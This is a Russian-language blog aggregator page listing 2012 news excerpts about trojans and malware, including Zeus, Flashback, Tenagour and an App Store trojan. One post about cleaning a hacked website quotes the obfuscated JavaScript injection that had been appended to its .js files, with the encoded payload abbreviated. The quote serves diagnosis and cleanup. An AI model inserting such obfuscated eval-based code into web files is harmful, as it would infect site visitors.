Недавно на Apple App Store обнаружили первый троян. Им стала програма Find And Call. Данной программа как я понял предоставляла что-то наподобие VoIP клиента с возможностями дзвонить, отправлять СМС, искать абонентов через интернет. Данная программа также была зарегистрирована на Google Play.
Читать полностью »
Рубрика «троян» - 5
Find and call: первый троян на App Store
2012-07-07 в 14:23, admin, рубрики: App Store, apple, информационная безопасность, троян, метки: app store, apple, троянАнтивирусы не могут победить Zeus
2012-07-02 в 7:06, admin, рубрики: zeus, Вирусы (и антивирусы), информационная безопасность, троян, метки: zeus, троян 
Исследование, посвящённое известному трояну Zeus, выпустила на днях компания ThreatMetrix Labs. Выводы специалистов не утешительны для тех, кто привык полагаться на актуальные антивирусные базы.
В настоящий момент Zeus не использует C&C-серверов, а посылает команды с помощью P2P. Целостность всей системы сохраняется благодаря надежному шифрованию файлов конфигурации.
Обнаружена новая версия троянца «Тибет», поражающего Mac OS
2012-06-30 в 9:19, admin, рубрики: mac os, mac os x, информационная безопасность, кибершпионаж, троян, метки: mac os, кибершпионаж, троян 
«Лаборатория Касперского» информирует об обнаружении новой версии вредоносной программы, известной как «Тибет».
Вирус поражает компьютеры с операционной системой Mac OS X, где использует известную уязвимость (Java exploit) и нацелен на определённую группу Уйгурских активистов.
Лечение сайта от вируса в файлах javascript и других на примере
2012-06-03 в 20:49, admin, рубрики: javascript, linux, trojan, вирусы, Вирусы (и антивирусы), информационная безопасность, лечение вирусов, сайт, троян, хостинг, метки: javascript, linux, trojan, вирусы, лечение вирусов, сайт, троян, хостингОднажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:
try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}
Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.
Далее, я зашёл в систему по SSH и от имени root выполнил команду Читать полностью »
Уязвимости платформы Android. Настоящее и будущее
2012-04-28 в 12:21, admin, рубрики: android, drweb, Malware, trojan, Блог компании Доктор Веб, вирус, информационная безопасность, троян, троянец, метки: android, drweb, Malware, trojan, вирус, троян, троянецУважаемые и многолюбимые читатели, предлагаем вам ознакомиться с крайне интересным материалом нашего аналитика Александра Горячева, написанным специально для Habrahabr. Статья посвящена обзору существующих уязвимостей крайне популярной мобильной платформы Android, а также тому, как можно было бы сделать ее более безопасной. Комментарии и собственные соображения по теме приветствуются.
ОС Android за небольшой промежуток времени стала одной из самых популярных систем для всевозможных мобильных устройств. Ее используют как крупные производители с мировым именем, так и небольшие компании, поэтому ценовой разброс готовой продукции, такой как смартфоны и планшетные компьютеры, позволяет удовлетворить потребности потребителей практически на сто процентов. Именно широкий ассортимент, гибкое ценообразование и поддержка платформы со стороны внушительного числа производителей стали одними из главных факторов успеха и позволили системе занять нынешнее положение на рынке.
Читать полностью »
FBI намекает: пора воспользоваться антивирусом!
2012-04-24 в 7:08, admin, рубрики: антивирусы, Блог компании MyAsterisk, троян, метки: антивирусы, троянФедеральное Бюро Расследований собирается отключить порядком 360 000 компьютеров Windows от Сети Интернет по причине массового заражения вирусом DNS Changer. Сроки воспользоваться антивирусом до 9 июля, после чего доступ во Всемирную Паутину для многих будет закрыт.
«Доктор Веб» обнаружил ботнет из более чем 550 000 «маков»
2012-04-04 в 13:36, admin, рубрики: drweb, MacOS, Блог компании Доктор Веб, троян, метки: drweb, MacOS, троян Специалисты компании «Доктор Веб» провели специальное исследование, позволившее оценить картину распространения троянской программы BackDoor.Flashback, заражающей компьютеры, работающие под управлением операционной системы Mac OS X. Сейчас в ботнете BackDoor.Flashback действует более 550 000 инфицированных рабочих станций, большая часть которых расположена на территории США и Канады. Это в очередной раз опровергает заявления некоторых экспертов об отсутствии угроз для пользователей «маков».
Читать полностью »
Блог компании Доктор Веб / Как мошенники предлагают «легко заработать» в Рунете (ВИДЕО)
2012-02-29 в 6:48, admin, рубрики: dr.web, антивирусы, видео, вирус, мошенничество, обзор, троянВсем привет!
Некоторое время назад мы выпустили видео-обзор в двух частях, в котором подробно разобрали некоторые мошеннические ресурсы в Рунете, предлагающие «легкий заработок в сети».
К сожалению, многие пользователи все еще позволяют ловить себя на этот крючок, по сути лишь тратя в пустую свое время и подвергая свой компьютер риску вирусного заражения.
В нашем видео мы подробно рассказываем, чем же опасно посещение соответствующих интернет-ресурсов.
Здесь мы выкладываем только вторую часть видео, хотя в ней есть много отсылок к первой части, которую вы также с легкостью сможете найти и посмотреть.
<iframeЧитать полностью »
Блог компании Доктор Веб / Trojan.Tenagour.9 помогает злоумышленникам в DDoS-атаках
2012-02-27 в 13:30, admin, рубрики: Новости, троянВсем привет!
Предупреждает о распространении вредоносной программы Trojan.Tenagour.9. Этот троянец представляет собой «продвинутый» инструмент для злоумышленников, осуществляющих DDoS-атаки на различные интернет-ресурсы.
Trojan.Tenagour.9 состоит из двух компонентов: инжектора и динамической библиотеки, в которой хранится полезная нагрузка.
После запуска в операционной системе троянец проверяет наличие своей установленной копии и, если таковая отсутствует, сохраняется в одну из папок под именем smss.exe, после чего прописывает себя в ветви системного реестра, отвечающей за автоматический запуск приложений.
ЗатемЧитать полностью »